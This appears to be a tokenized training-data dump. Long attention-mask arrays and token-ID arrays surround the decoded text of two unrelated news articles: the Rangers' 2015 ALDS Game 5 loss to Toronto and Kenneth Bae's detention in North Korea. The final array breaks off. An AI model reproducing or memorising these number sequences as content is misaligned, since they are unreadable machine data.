1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
TORONTO -- Cole Hamels' run as the clinch-master came to an end, along with the Texas Rangers' season, on Wednesday in a 6-3 loss to the Blue Jays in Game 5 of the American League Division Series, but Hamels wasn't in the mood to lament. The veteran left-hander already was entertaining the thought of a loaded Rangers team descending on Surprise, Ariz., in the spring and getting ready for another run at the World Series in 2016. That was the thought of many around baseball when Texas acquired the 2008 Fall Classic MVP from Philadelphia in July, but over the ensuing two months, the timetable was accelerated. :: ALDS: Rangers vs. Blue Jays -- Results :: "We've got some exceptional talent, great young rookies and some good veteran leadership," Hamels said, "so I think being able to look forward to next year, having [injured pitcher Yu Darvish] back, we'll have a full, healthy [Adrian Beltre] back, what's there not to like? "I think that's something that we're really excited about. To have guys that are healthy that are huge parts of this team and big parts in baseball, it's going to be fun to partner up with them and see what we can do next year." Going into the winner-take-all Game 5, Texas had won in Hamels' previous 11 outings, including Game 2 of the ALDS. While Game 5 marked Hamels' first career start in a winner-take-all game and while facing potential elimination, he had made four starts in a potential clinch game for his team, all with the Phillies, and Philadelphia had won all four. Video: [email protected] Gm5: Jeff Banister on Rangers' ALDS loss Not even that could hold up in a bizarre game for the ages that featured a 53-minute seventh inning that Hamels started and did not finish, and included the following: • A Rangers run scoring from third base when Toronto catcher Russell Martin's throw back to pitcher Aaron Sanchez hit batter Shin-Soo Choo's hand and rebounded onto the field of play. • Several delays as passionate fans disrupted play by throwing debris onto the field. • Three consecutive errors by Rangers infielders that loaded the bases. • A monstrous Jose Bautista three-run home run off Rangers reliever Sam Dyson that ended up winning the game for Toronto. • A few near-dust-ups between the two clubs. • A loss for Hamels. Hamels has been around the sport long enough to have seen just about everything. He was able to digest it all and still emerge with a positive outlook for what the Rangers -- who finished in last place in the AL West in 2014, rebounded to win the division this year, and gave the Blue Jays a hard-fought ALDS to remember -- are building. Hamels ended up going 6 1/3 innings and giving up five runs (two earned) on four hits while striking out eight and walking two on Wednesday, and he said he was ready to get after it again soon. "I think I could pitch tomorrow," Hamels said. "I wish there was a Game 6."
[ 1, 323, 1955, 1164, 4986, 1192, 16816, 7904, 1379, 29915, 1065, 408, 278, 1067, 22466, 29899, 6207, 2996, 304, 385, 1095, 29892, 3412, 411, 278, 10319, 390, 13873, 29915, 4259, 29892, 373, 15050, 4515, 3250, 297, 263, 29871, 29953, 29899, 29941, 6410, 304, 278, 10924, 435, 1036, 297, 8448, 29871, 29945, 310, 278, 3082, 5165, 7946, 10488, 29892, 541, 7904, 1379, 9007, 29915, 29873, 297, 278, 286, 2092, 304, 301, 1166, 29889, 13, 13, 1576, 25808, 273, 2175, 29899, 3179, 261, 2307, 471, 22684, 292, 278, 2714, 310, 263, 7500, 390, 13873, 3815, 5153, 2548, 373, 6298, 7734, 29892, 319, 7485, 1696, 297, 278, 6709, 322, 2805, 7960, 363, 1790, 1065, 472, 278, 2787, 10488, 297, 29871, 29906, 29900, 29896, 29953, 29889, 2193, 471, 278, 2714, 310, 1784, 2820, 21573, 746, 10319, 16692, 278, 29871, 29906, 29900, 29900, 29947, 14053, 24300, 341, 18510, 515, 18292, 297, 5468, 29892, 541, 975, 278, 427, 2146, 292, 1023, 7378, 29892, 278, 5335, 300, 519, 471, 15592, 630, 29889, 13, 13, 1057, 14445, 8452, 29901, 390, 13873, 7186, 29889, 10924, 435, 1036, 1192, 17212, 4761, 13, 13, 29908, 4806, 29915, 345, 2355, 777, 3682, 284, 24242, 29892, 2107, 4123, 696, 554, 583, 322, 777, 1781, 25808, 273, 26001, 1699, 7904, 1379, 1497, 29892, 376, 578, 306, 1348, 1641, 2221, 304, 1106, 6375, 304, 2446, 1629, 29892, 2534, 518, 262, 29926, 2955, 15905, 261, 27669, 7335, 29894, 728, 29962, 1250, 29892, 591, 29915, 645, 505, 263, 2989, 29892, 9045, 29891, 518, 3253, 6392, 350, 2152, 276, 29962, 1250, 29892, 825, 29915, 29879, 727, 451, 304, 763, 29973, 13, 13, 29908, 29902, 1348, 393, 29915, 29879, 1554, 393, 591, 29915, 276, 2289, 24173, 1048, 29889, 1763, 505, 18239, 393, 526, 9045, 29891, 393, 526, 12176, 5633, 310, 445, 3815, 322, 4802, 5633, 297, 21573, 29892, 372, 29915, 29879, 2675, 304, 367, 2090, 304, 18096, 701, 411, 963, 322, 1074, 825, 591, 508, 437, 2446, 1629, 1213, 13, 13, 8120, 292, 964, 278, 19576, 29899, 19730, 29899, 497, 8448, 29871, 29945, 29892, 10319, 750, 2113, 297, 7904, 1379, 29915, 3517, 29871, 29896, 29896, 714, 886, 29892, 3704, 8448, 29871, 29906, 310, 278, 14445, 8452, 29889, 5806, 8448, 29871, 29945, 10902, 7904, 1379, 29915, 937, 6413, 1369, 297, 263, 19576, 29899, 19730, 29899, 497, 3748, 322, 1550, 14870, 7037, 29007, 3381, 29892, 540, 750, 1754, 3023, 8665, 297, 263, 7037, 1067, 22466, 3748, 363, 670, 3815, 29892, 599, 411, 278, 21856, 583, 29892, 322, 18292, 750, 2113, 599, 3023, 29889, 13, 13, 15167, 29901, 518, 5269, 6364, 29962, 402, 29885, 29945, 29901, 12208, 10765, 1531, 373, 390, 13873, 29915, 14445, 8452, 6410, 13, 13, 3664, 1584, 393, 1033, 4808, 701, 297, 263, 289, 15356, 276, 3748, 363, 278, 24646, 393, 15000, 263, 29871, 29945, 29941, 29899, 1195, 1082, 16741, 29882, 297, 1076, 393, 7904, 1379, 4687, 322, 1258, 451, 8341, 29892, 322, 5134, 278, 1494, 29901, 13, 13, 30119, 319, 390, 13873, 1065, 26654, 515, 4654, 2967, 746, 17612, 4380, 261, 20679, 6502, 29915, 29879, 3183, 1250, 304, 15905, 261, 319, 5022, 3087, 22067, 7124, 10193, 27948, 29899, 29903, 3634, 678, 3634, 29915, 29879, 1361, 322, 15121, 7261, 11480, 278, 1746, 310, 1708, 29889, 13, 13, 30119, 21882, 628, 1036, 408, 15935, 403, 24909, 766, 14214, 1708, 491, 17452, 316, 1182, 275, 11480, 278, 1746, 29889, 13, 13, 30119, 12753, 18942, 4436, 491, 390, 13873, 297, 2671, 414, 393, 7500, 278, 22561, 29889, 13, 13, 30119, 319, 1601, 710, 681, 5043, 350, 1300, 2079, 2211, 29899, 3389, 3271, 1065, 1283, 390, 13873, 1104, 347, 369, 3685, 360, 952, 265, 393, 9698, 701, 15613, 278, 3748, 363, 17612, 29889, 13, 13, 30119, 319, 2846, 2978, 29899, 29881, 504, 29899, 14340, 1546, 278, 1023, 17651, 29889, 13, 13, 30119, 319, 6410, 363, 7904, 1379, 29889, 13, 13, 29950, 314, 1379, 756, 1063, 2820, 278, 7980, 1472, 3307, 304, 505, 3595, 925, 1048, 4129, 29889, 940, 471, 2221, 304, 4697, 342, 372, 599, 322, 1603, 11176, 479, 411, 263, 6374, 714, 6914, 363, 825, 278, 390, 13873, 1192, 1058, 7743, 297, 1833, 2058, 297, 278, 14445, 3122, 297, 29871, 29906, 29900, 29896, 29946, 29892, 15121, 7261, 304, 5401, 278, 8542, 445, 1629, 29892, 322, 4846, 278, 10924, 435, 1036, 263, 2898, 29899, 29888, 1774, 14445, 8452, 304, 6456, 1192, 526, 5214, 29889, 13, 13, 29950, 314, 1379, 9698, 701, 2675, 29871, 29953, 29871, 29896, 29914, 29941, 7622, 886, 322, 6820, 701, 5320, 6057, 313, 10184, 20591, 29897, 373, 3023, 19572, 1550, 29191, 714, 9475, 322, 22049, 1023, 373, 15050, 4515, 3250, 29892, 322, 540, 1497, 540, 471, 7960, 304, 679, 1156, 372, 1449, 4720, 29889, 13, 13, 29908, 29902, 1348, 306, 1033, 15905, 6454, 22396, 1699, 7904, 1379, 1497, 29889, 376, 29902, 6398, 727, 471, 263, 8448, 29871, 29953, 1213 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Kenneth Bae, who has been jailed in North Korea for 15 months, told reporters there that he committed a "serious crime" in the secretive nation and that he had not experienced abusive treatment by the regime. But any statement made by Bae in captivity would be sanctioned by the North Korean government, whose widespread human rights abuses are known to the world. The country has a long history of exacting false confessions. There was something off, his mother said, when she saw him on television. Just Watched Kenneth Bae Speaks Americans detained abroad – Jeffrey Edward Fowle, one of three Americans detained in North Korea, was released and is now on his way home, a State Department official told CNN on Tuesday, October 21. Fowle was accused of leaving a Bible in a hotel where he was staying. North Korea announced Fowle's detention in June, saying he had violated the law by acting "contrary to the purpose of tourism." Fowle told CNN: "I've admitted my guilt to the government and signed a statement to that effect and requested forgiveness from the people and the government of the DPRK." Hide Caption 1 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Matthew Todd Miller, the American sentenced to six years of hard labor in North Korea begins serving his six-year sentence on September 25. He is one of three Americans detained in North Korea, who spoke to CNN's Will Ripley on Monday, September 1, and implored the U.S. government for help. The 24-year-old is accused of tearing up his tourist visa and seeking asylum upon entry. Hide Caption 2 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – In May 2013, a North Korean court sentenced Kenneth Bae, a U.S. citizen, to 15 years of hard labor for committing "hostile acts" against the state. North Korea claimed Bae was part of a Christian plot to overthrow the regime. In a short interview with CNN on Monday, September 1, Bae said he is working eight hours a day, six days a week at a labor camp. "Right now what I can say to my friends and family is, continue to pray for me," he said. Hide Caption 3 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – American journalist Peter Theo Curtis was handed over to U.N. peacekeepers on August 24 after nearly two years in captivity. He is believed to have been captured in October 2012 and held by the al-Nusra Front, a Syrian rebel group with ties to al Qaeda. Hide Caption 4 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Alan Gross, at right with Rabbi Arthur Schneier, has been in Cuban custody since December 2009, when he was jailed while working as a subcontractor. Cuban authorities say Gross tried to set up illegal Internet connections on the island. Gross says he was just trying to help connect the Jewish community to the Internet. Former President Jimmy Carter and New Mexico Gov. Bill Richardson have both traveled to Cuba on Gross' behalf, but they were unable to secure his release. Hide Caption 5 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – This undated image provided by the U.S. Army shows Sgt. Bowe Bergdahl, who had been held by insurgents in Afghanistan since 2009. The White House announced Bergdahl's release on May 31. Bergdahl was released in exchange for five senior Taliban members held by the U.S. military. Hide Caption 6 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – An Iranian court threw out a 2011 death sentence for Amir Hekmati, a former U.S. Marine charged with spying. But he was secretly retried in Iran and convicted of "practical collaboration with the U.S. government," his sister told CNN on April 11. He has been sentenced to 10 years in prison, she said. Hekmati was detained in August 2011 during a visit to see his grandmother. His family and the Obama administration deny accusations he was spying for the CIA. Hide Caption 7 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Retired FBI agent Robert Levinsonhas been missing since 2007. His family says he was working as a private investigator in Iran when he disappeared, and multiple reports suggest Levinson may have been working for the CIA. His family told CNN in January that they have long known that Levinson worked for the CIA, and they said it's time for the government to lay out the facts about Levinson's case. U.S. officials have consistently denied publicly that Levinson was working for the government, but they have repeatedly insisted that finding him and bringing him home is a "top" priority. Hide Caption 8 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Warren Weinstein, a contractor held by al Qaeda militants, is a U.S. citizen who has been held hostage in Pakistan since August 2011. Hide Caption 9 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – U.S. tourist and Korean War veteran Merrill Newman arrives at the Beijing airport on December 7, 2013, after being released by North Korea. Newman was detained in October 2013 by North Korean authorities just minutes before he was to depart the country after visiting through an organized tour. His son Jeff Newman said the Palo Alto, California, man had all the proper paperwork and set up his trip through a North Korean-approved travel agency. Hide Caption 10 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Mexican authorities arrested Yanira Maldonado, a U.S. citizen, right, in May 2013, for alleged drug possession. She and her husband, Gary, were traveling from Mexico back to the United States when their bus was stopped and searched. She was released a few days later and is now back in the United States. Hide Caption 11 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Saeed Abedini, a 33-year-old U.S. citizen of Iranian birth, was sentenced to eight years in prison in January 2013. He was accused of attempting to undermine the Iranian government and endangering national security by establishing home churches. Hide Caption 12 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – North Korea has arrested Americans before, only to release them after a visit by a prominent dignitary. Journalists Laura Ling, center, and Euna Lee, to her right, spent 140 days in captivity after being charged with illegal entry to conduct a smear campaign. They were freed in 2009 after a trip by former President Bill Clinton. Hide Caption 13 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Former President Jimmy Carter negotiated the release of Aijalon Gomes, who was detained in 2010 after crossing into North Korea illegally from China. Analysts say high-level visits give Pyongyang a propaganda boost and a way to save face when it releases a prisoner. Hide Caption 14 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Eddie Yong Su Jun was released by North Korea a month after he was detained in April 2011. His alleged crime was not provided to the media. The American delegation that secured his freedom included Robert King, the U.S. special envoy for North Korean human rights issues. Hide Caption 15 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Robert Park was released by North Korea in 2010 without any apparent U.S. intervention. The Christian missionary crossed into North Korea from China, carrying a letter asking Kim Jong Il to free political prisoners and resign. North Korea's state-run news agency said Park was released after an "admission and sincere repentance of his wrongdoings." Here, Park holds a photo of Kim and a malnourished child during a protest in Seoul. Hide Caption 16 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Josh Fattal, center, Sarah Shourd, left, and Shane Bauer were detained by Iran while hiking near the Iraq-Iran border in July 2009. Iran charged them with illegal entry and espionage. Shourd was released on bail for medical reasons in September 2010; she never returned to face her charges. Bauer and Fattal were convicted in August 2011, but the next month they were released on bail and had their sentences commuted. Hide Caption 17 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Haleh Esfandiari, an Iranian-American scholar, was detained at Iran's Evin Prison, spending months in solitary confinement before Iran released her on bail in August 2007. Esfandiari was visiting her ailing mother in Tehran when she was arrested and charged with harming Iran's national security. Hide Caption 18 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Sixteen Americans were among the dozens arrested in December 2011 when Egypt raided the offices of 10 nongovernmental organizations that it said received illegal foreign financing and were operating without a public license. Many of the employees posted bail and left the country after a travel ban was lifted a few months later. Robert Becker, right, chose to stay and stand trial. Hide Caption 19 of 20 Photos: Americans detained abroad20 photos Americans detained abroad – Filmmaker Timothy Tracywas arrested in Venezuela in April 2013 on allegations of funding opponents of newly elected President Nicolas Maduro, successor to the late Hugo Chavez. Tracy went to Venezuela to make a documentary about the political division gripping the country. He was released in June 2013. In his remarks, Kenneth Bae asked the U.S. government, the media and his family to not make things worse by spreading "vile rumors" about North Korea. He also asked his family and other supporters to make more active efforts to secure his freedom. "We're hoping that we're getting closer to the end," Bae's sister, Terri Chung, told CNN. "I'm glad that he had a platform to speak, but it is also flooded back with a lot of mixed emotions, watching him in that prison uniform." The family is scared for him, Chung said, and is appealing to anyone who may help Bae's cause. "We believe that Kenneth is being treated well, as he said, and we hope that North Korean authorities will have mercy and allow Kenneth to come home," she said. The U.S. government is doing what it can, Chung said, adding that she thinks that "things are in the works." Bae, of Lynwood, Washington, was arrested in November 2012 in Rason, along North Korea's northeastern coast. The devout Christian and father of three operated a China-based company specializing in tours of North Korea, according to his family and freekennow.com, a website that friends set up to promote his release. "He looks very distressed," Bae's mother said. "He has a strong, strong mind, but, I don't know, after 15 months, he has to maintain the same stable mind all the time. I'm kind of worried about that."
[ 1, 28576, 350, 3660, 29892, 1058, 756, 1063, 12337, 2356, 297, 4644, 19109, 363, 29871, 29896, 29945, 7378, 29892, 5429, 1634, 272, 2153, 727, 393, 540, 19355, 263, 376, 643, 2738, 17268, 29908, 297, 278, 7035, 573, 5233, 322, 393, 540, 750, 451, 18860, 633, 375, 573, 14502, 491, 278, 22384, 29889, 13, 13, 6246, 738, 3229, 1754, 491, 350, 3660, 297, 4332, 2068, 723, 367, 9753, 428, 287, 491, 278, 4644, 22467, 5874, 29892, 5069, 281, 2247, 29886, 949, 5199, 10462, 633, 6394, 526, 2998, 304, 278, 3186, 29889, 450, 4234, 756, 263, 1472, 4955, 310, 2684, 292, 2089, 1970, 10964, 29889, 13, 13, 8439, 471, 1554, 1283, 29892, 670, 5637, 1497, 29892, 746, 1183, 4446, 1075, 373, 11456, 29889, 13, 13, 14084, 24274, 287, 13, 13, 29968, 2108, 621, 350, 3660, 5013, 10327, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 12208, 8903, 9300, 383, 340, 280, 29892, 697, 310, 2211, 23035, 1439, 7114, 297, 4644, 19109, 29892, 471, 5492, 322, 338, 1286, 373, 670, 982, 3271, 29892, 263, 4306, 10317, 6221, 5429, 29696, 373, 323, 1041, 3250, 29892, 5533, 29871, 29906, 29896, 29889, 383, 340, 280, 471, 28886, 310, 10124, 263, 21958, 297, 263, 16730, 988, 540, 471, 7952, 292, 29889, 4644, 19109, 9326, 383, 340, 280, 29915, 29879, 1439, 2509, 297, 5306, 29892, 5934, 540, 750, 5537, 630, 278, 4307, 491, 16684, 376, 9996, 653, 304, 278, 6437, 310, 6282, 1608, 1213, 383, 340, 280, 5429, 29696, 29901, 376, 29902, 29915, 345, 20186, 590, 1410, 2782, 304, 278, 5874, 322, 8794, 263, 3229, 304, 393, 2779, 322, 13877, 18879, 20193, 515, 278, 2305, 322, 278, 5874, 310, 278, 360, 10593, 29968, 1213, 13, 13, 29950, 680, 9243, 683, 13, 13, 29896, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 22292, 7561, 29881, 16498, 29892, 278, 3082, 2665, 9223, 304, 4832, 2440, 310, 2898, 10212, 297, 4644, 19109, 16410, 16330, 670, 4832, 29899, 6360, 10541, 373, 3839, 29871, 29906, 29945, 29889, 940, 338, 697, 310, 2211, 23035, 1439, 7114, 297, 4644, 19109, 29892, 1058, 12707, 304, 29696, 29915, 29879, 2811, 21710, 552, 29891, 373, 27822, 29892, 3839, 29871, 29896, 29892, 322, 13374, 4395, 278, 501, 29889, 29903, 29889, 5874, 363, 1371, 29889, 450, 29871, 29906, 29946, 29899, 6360, 29899, 1025, 338, 28886, 310, 734, 4362, 701, 670, 6282, 391, 1998, 29874, 322, 25738, 408, 2904, 398, 2501, 6251, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29906, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 512, 2610, 29871, 29906, 29900, 29896, 29941, 29892, 263, 4644, 22467, 8973, 2665, 9223, 28576, 350, 3660, 29892, 263, 501, 29889, 29903, 29889, 14497, 264, 29892, 304, 29871, 29896, 29945, 2440, 310, 2898, 10212, 363, 844, 5367, 376, 3069, 488, 14741, 29908, 2750, 278, 2106, 29889, 4644, 19109, 17049, 350, 3660, 471, 760, 310, 263, 6111, 6492, 304, 975, 20539, 278, 22384, 29889, 512, 263, 3273, 15593, 411, 29696, 373, 27822, 29892, 3839, 29871, 29896, 29892, 350, 3660, 1497, 540, 338, 1985, 9475, 6199, 263, 2462, 29892, 4832, 3841, 263, 4723, 472, 263, 10212, 4242, 29889, 376, 7341, 1286, 825, 306, 508, 1827, 304, 590, 7875, 322, 3942, 338, 29892, 6773, 304, 12475, 363, 592, 1699, 540, 1497, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29941, 310, 29871, 29906, 29900, 13, 13, 4819, 15788, 29901, 23035, 1439, 7114, 28177, 29906, 29900, 20612, 13, 13, 9816, 16708, 1439, 7114, 28177, 785, 3082, 24452, 5310, 450, 29877, 25141, 275, 471, 29692, 975, 304, 501, 29889, 29940, 29889, 10776, 17462, 414, 373, 3111, 29871, 29906, 29946, 1156, 8886, 1023, 2440, 297, 4332, 2068, 29889, 940, 338, 13112, 304, 505, 1063, 15468, 297, 5533, 29871, 29906, 29900, 29896, 29906, 322, 4934, 491, 278, 394, 29899, 29940, 375, 336, 13960, 29892, 263, 8713, 6392, 337, 6596, 2318, 411, 260, 583, 304, 394, 660, 29874, 8710, 29889, 13, 13, 29950, 680, 9243, 683, 13, 13, 29946, 310, 